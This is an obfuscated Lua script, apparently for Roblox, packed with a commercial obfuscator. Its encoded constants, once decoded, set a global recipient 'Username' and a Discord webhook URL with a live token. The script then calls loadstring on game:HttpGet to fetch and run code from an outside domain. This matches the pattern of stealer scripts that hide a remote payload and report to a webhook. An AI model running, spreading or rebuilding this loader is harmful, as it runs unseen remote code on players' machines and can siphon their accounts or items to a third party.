--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v104=0;local v105;while true do if (v104==1) then return v105;end if (v104==0) then v105=v5(v87,v19);v19=nil;v104=1;end end else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -(878 -(282 + 595))))) + (620 -(555 + 64)))) ;return v88-(v88%(932 -(857 + 74))) ;else local v89=(570 -(367 + 201))^(v32-((2565 -(1523 + 114)) -(193 + 21 + (1015 -302)))) ;return (((v31%(v89 + v89))>=v89) and (1 + 0)) or (0 + (1065 -(68 + 997))) ;end end local function v21() local v34=1270 -(226 + 232 + 812) ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22() local v36=957 -(892 + 65) ;local v37;local v38;while true do if (v36==(0 -(0 + 0))) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=1;end if (v36==(351 -(87 + 263))) then return (v38 * (436 -(67 + (277 -164)))) + v37 ;end end end local function v23() local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==0) then v40,v41,v42,v43=v1(v16,v18,v18 + ((31 -20) -8) );v18=v18 + ((557 + 399) -(802 + 150)) ;v39=2 -1 ;end if (v39==(1 -0)) then return (v43 * (12211951 + 4565265)) + (v42 * 65536) + (v41 * (1253 -(915 + 82))) + v40 ;end end end local function v24() local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(1189 -(1069 + 118))) then v49=v20(v46,13 + 8 ,70 -39 );v50=((v20(v46,69 -37 )==(1 + 0 + 0)) and  -((2 -1) -0)) or ((1 -0) + 0) ;v44=1 + 2 ;end if (v44==((2433 -1642) -(368 + 121 + 302))) then v45=v23();v46=v23();v44=3 -2 ;end if (v44==(4 -(1414 -(447 + 966)))) then if (v49==(1080 -(1020 + 60))) then if (v48==(18 -((22 -12) + 8))) then return v50 * (0 -(14 -(9 + 5))) ;else v49=3 -2 ;v47=442 -(416 + 26) ;end elseif (v49==(6535 -4488)) then return ((v48==(0 -0)) and (v50 * ((1 + 0)/((0 -0) -0)))) or (v50 * NaN) ;end return v8(v50,v49-(2936 -((3606 -(1703 + 114)) + 124)) ) * (v47 + (v48/(((816 -(85 + 291)) -(145 + 293))^((719 -(376 + 325)) + 34)))) ;end if (v44==(2 -1)) then v47=(1639 -1208) -(44 + 386) ;v48=(v20(v46,1 + 0 ,1506 -(998 + 488) ) * ((1 + 1)^(27 + 5))) + v45 ;v44=774 -(201 + 571) ;end end end local function v25(v51) local v52;if  not v51 then local v90=0 + 0 ;while true do if (v90==(1180 -(1123 + 57))) then v51=v23();if (v51==(0 + 0)) then return "";end break;end end end v52=v3(v16,v18,(v18 + v51) -(255 -(163 + 91)) );v18=v18 + v51 ;local v53={};for v68=1, #v52 do v53[v68]=v2(v1(v3(v52,v68,v68)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 -0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do local v70=(function() return 0;end)();while true do if (1~=v70) then else if ((1 + 2)==v54) then for v106= #"\\",v23() do local v107=(function() return v21();end)();if (v20(v107, #"}", #"]")~=0) then else local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v109==(3 -1)) then while true do if (v110== #"91(") then if (v20(v112, #"nil", #"asd")== #"{") then v113[ #"0313"]=(function() return v61[v113[ #".com"]];end)();end v56[v106]=(function() return v113;end)();break;end if (v110== #"<") then local v152=(function() return 1467 -(899 + 568) ;end)();while true do if ((1 + 0)==v152) then v110=(function() return 2;end)();break;end if (v152==0) then v113=(function() return {v22(),v22(),nil,nil};end)();if (v111==(0 -0)) then local v184=(function() return 0;end)();while true do if (v184==0) then v113[ #"nil"]=(function() return v22();end)();v113[ #"asd1"]=(function() return v22();end)();break;end end elseif (v111== #"}") then v113[ #"gha"]=(function() return v23();end)();elseif (v111==2) then v113[ #"xxx"]=(function() return v23() -(2^16) ;end)();elseif (v111== #"gha") then local v193=(function() return 0;end)();local v194=(function() return;end)();while true do if (v193~=0) then else v194=(function() return 0;end)();while true do if (v194==(603 -(268 + 335))) then v113[ #"gha"]=(function() return v23() -(2^(306 -(60 + 230))) ;end)();v113[ #"0313"]=(function() return v22();end)();break;end end break;end end end v152=(function() return 573 -(426 + 146) ;end)();end end end if (v110==2) then local v153=(function() return 0;end)();while true do if (v153==1) then v110=(function() return  #"nil";end)();break;end if (v153~=0) then else if (v20(v112, #"]", #"!")== #" ") then v113[1 + 1 ]=(function() return v61[v113[1458 -(282 + 1174) ]];end)();end if (v20(v112,813 -(569 + 242) ,2)== #"/") then v113[ #"asd"]=(function() return v61[v113[ #"xnx"]];end)();end v153=(function() return 1;end)();end end end if (v110~=(0 -0)) then else local v154=(function() return 0;end)();local v155=(function() return;end)();while true do if (v154==0) then v155=(function() return 0 + 0 ;end)();while true do if (v155~=(1025 -(706 + 318))) then else v110=(function() return  #"~";end)();break;end if (v155~=(1251 -(721 + 530))) then else v111=(function() return v20(v107,2, #"gha");end)();v112=(function() return v20(v107, #"xnxx",6);end)();v155=(function() return 1;end)();end end break;end end end end break;end if (v109~=(1272 -(945 + 326))) then else v112=(function() return nil;end)();v113=(function() return nil;end)();v109=(function() return 4 -2 ;end)();end if (v109==(0 + 0)) then v110=(function() return 0;end)();v111=(function() return nil;end)();v109=(function() return 701 -(271 + 429) ;end)();end end end end for v108= #"{",v23() do v57,v108,v28=(function() return v55(v57,v108,v28);end)();end return v59;end if (v54==1) then local v99=(function() return 0 + 0 ;end)();while true do if ((1500 -(1408 + 92))==v99) then v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v99=(function() return 1;end)();end if (v99~=1) then else v60=(function() return v23();end)();v54=(function() return 1290 -(993 + 295) ;end)();break;end end end break;end if (v70==0) then if ((1 + 1)==v54) then local v100=(function() return 1171 -(418 + 753) ;end)();local v101=(function() return;end)();while true do if (v100==0) then v101=(function() return 0 + 0 ;end)();while true do if (v101==(0 + 0)) then v61=(function() return {};end)();for v115= #"[",v60 do local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==(1 + 0)) then v119=(function() return nil;end)();while true do if (v117==0) then local v182=(function() return 529 -(406 + 123) ;end)();while true do if (v182==(1769 -(1749 + 20))) then v118=(function() return v21();end)();v119=(function() return nil;end)();v182=(function() return 1 + 0 ;end)();end if ((1323 -(1249 + 73))==v182) then v117=(function() return 1 + 0 ;end)();break;end end end if (v117~=(1146 -(466 + 679))) then else if (v118== #"]") then v119=(function() return v21()~=(0 -0) ;end)();elseif (v118==2) then v119=(function() return v24();end)();elseif (v118== #"-19") then v119=(function() return v25();end)();end v61[v115]=(function() return v119;end)();break;end end break;end if (v116~=0) then else local v168=(function() return 0 -0 ;end)();while true do if ((1901 -(106 + 1794))==v168) then v116=(function() return 1 + 0 ;end)();break;end if (v168~=(0 + 0)) then else v117=(function() return 0;end)();v118=(function() return nil;end)();v168=(function() return 2 -1 ;end)();end end end end end v101=(function() return 2 -1 ;end)();end if (v101~=1) then else v59[ #"xxx"]=(function() return v21();end)();v54=(function() return 117 -(4 + 110) ;end)();break;end end break;end end end if (v54~=(584 -(57 + 527))) then else local v102=(function() return 0;end)();local v103=(function() return;end)();while true do if (v102~=(1427 -(41 + 1386))) then else v103=(function() return 0;end)();while true do if (v103~=(104 -(17 + 86))) then else v57=(function() return {};end)();v54=(function() return 1;end)();break;end if (v103~=(0 + 0)) then else v55=(function() return function(v146,v147,v148) local v149=(function() return 0 -0 ;end)();local v150=(function() return;end)();while true do if ((0 -0)~=v149) then else v150=(function() return 0;end)();while true do if (v150~=(166 -(122 + 44))) then else local v187=(function() return 0;end)();while true do if (v187~=(0 -0)) then else v146[v147-#"/" ]=(function() return v148();end)();return v146,v147,v148;end end end end break;end end end;end)();v56=(function() return {};end)();v103=(function() return 3 -2 ;end)();end end break;end end end v70=(function() return 1;end)();end end end end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[1 + 1 ];local v67=v62[3];return function(...) local v71=v65;local v72=v66;local v73=v67;local v74=v27;local v75=1 -(0 -0) ;local v76= -(66 -(30 + 35));local v77={};local v78={...};local v79=v12("#",...) -(1258 -(1043 + 214)) ;local v80={};local v81={};for v91=0 -0 ,v79 do if (v91>=v73) then v77[v91-v73 ]=v78[v91 + (1213 -(323 + 889)) ];else v81[v91]=v78[v91 + 1 ];end end local v82=(v79-v73) + (2 -1) ;local v83;local v84;while true do local v92=580 -((2294 -(565 + 1368)) + 219) ;while true do if ((v92==(320 -(53 + 267))) or (846>=2368)) then v83=v71[v75];v84=v83[1 + 0 ];v92=1;end if (v92==((1556 -1142) -(15 + 398))) then if (v84<=(991 -(18 + 964))) then if (v84<=(14 -10)) then if ((v84<=(1 + 0)) or (4134<=3926) or (4012<=3358)) then if ((1494<=3005) and (v84>(0 + 0))) then local v120=0;local v121;local v122;local v123;local v124;while true do if ((852 -((1681 -(1477 + 184)) + 830))==v120) then for v172=v121,v76 do v124=v124 + 1 + (0 -0) ;v81[v172]=v122[v124];end break;end if ((v120==(127 -(116 + 10))) or (164>=2785)) then v76=(v123 + v121) -1 ;v124=0 + 0 + 0 ;v120=2;end if (v120==(738 -(542 + 196))) then v121=v83[3 -(857 -(564 + 292)) ];v122,v123=v74(v81[v121](v13(v81,v121 + 1 ,v83[1 + 2 ])));v120=1 + 0 ;end end else v81[v83[1 + (1 -0) ]]=v64[v83[3]];end elseif (v84<=(4 -2)) then do return;end elseif ((v84==3) or (3111==2134)) then v81[v83[4 -2 ]]();else local v156=1551 -(1126 + 425) ;local v157;while true do if ((2355==2355) and ((v156==(405 -(118 + 287))) or (525==2109))) then v157=v83[7 -5 ];v81[v157]=v81[v157](v13(v81,v157 + (1122 -(118 + 1003)) ,v76));break;end end end elseif (v84<=(17 -(33 -22))) then if ((v84>(382 -(142 + 235))) or (588<=432)) then local v127=0 -(304 -(244 + 60)) ;local v128;local v129;local v130;local v131;while true do if (v127==0) then v128=v83[2];v129,v130=v74(v81[v128](v13(v81,v128 + 1 + 0 ,v83[980 -(553 + 424) ])));v127=1 -0 ;end if ((1 + 0)==v127) then v76=(v130 + v128) -(1 + 0) ;v131=0 + 0 ;v127=2 + 0 ;end if ((4797>=3895) and (33==33) and (v127==(1 + 1))) then for v175=v128,v76 do v131=v131 + (477 -(41 + 435)) ;v81[v175]=v129[v131];end break;end end else v64[v83[2 + 1 ]]=v81[v83[(1005 -(938 + 63)) -2 ]];end elseif ((3577==3577) and (3054<=4015) and (v84<=7)) then v64[v83[7 -(4 + 0) ]]=v81[v83[2]];elseif (v84>(17 -9)) then v81[v83[1 + 1 ]]=v83[14 -11 ];else v75=v83[756 -(239 + 514) ];end elseif (v84<=(5 + 9)) then if ((3794>3693) and (1871<3382) and (v84<=(1340 -(797 + 532)))) then if ((1293<=2166) and (v84==10)) then do return;end else v75=v83[3];end elseif ((v84<=(9 + 3)) or (1275==4100)) then local v137=v83[1 + (1126 -(936 + 189)) ];v81[v137]=v81[v137](v13(v81,v137 + 1 ,v76));elseif (v84==((10 + 19) -(1629 -(1565 + 48)))) then if (v81[v83[1204 -(373 + 829) ]]==v83[735 -(295 + 181 + 255) ]) then v75=v75 + (1131 -(369 + 761)) ;else v75=v83[3];end else v81[v83[(1140 -(782 + 356)) + 0 ]]=v83[5 -2 ];end elseif (v84<=(29 -13)) then if ((v84==(253 -(64 + 174))) or (2579<123)) then v81[v83[2]]();else local v139=v83[1 + 1 ];local v140=v81[v83[3 -0 ]];v81[v139 + ((604 -(176 + 91)) -(144 + 192)) ]=v140;v81[v139]=v140[v83[220 -((108 -66) + 174) ]];end elseif (v84<=17) then v81[v83[2 + 0 ]]=v64[v83[3 + 0 ]];elseif (v84>(8 + (14 -4))) then if (v81[v83[1506 -(363 + 1141) ]]==v83[4]) then v75=v75 + (1581 -(1183 + 397)) ;else v75=v83[8 -5 ];end else local v163=v83[2];local v164=v81[v83[3 + (1092 -(975 + 117)) ]];v81[v163 + 1 + 0 ]=v164;v81[v163]=v164[v83[1979 -((3788 -(157 + 1718)) + 51 + 11) ]];end v75=v75 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E737061636503083O00557365726E616D65030A3O006372616E6B656E65727A03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132373034323339333835374O323533352F46596A7149747662716C68546F50595F4C496749774C33782O4677357A4A717A3750674A71396D7A50665770684D726D4C6F6B35784C70346256335743715F6273775443001C3O0012093O00013O0026133O000B000100020004083O000B000100122O000100033O00122O000200043O002012000200020005001209000400064O0006000200044O000C00013O00022O00030001000100010004083O001B00010026133O0001000100010004083O00010001001209000100013O00261300010015000100010004083O00150001001209000200083O001207000200073O0012090002000A3O001207000200093O001209000100023O0026130001000E000100020004083O000E00010012093O00023O0004083O000100010004083O000E00010004083O000100012O00023O00017O00",v9(),...);
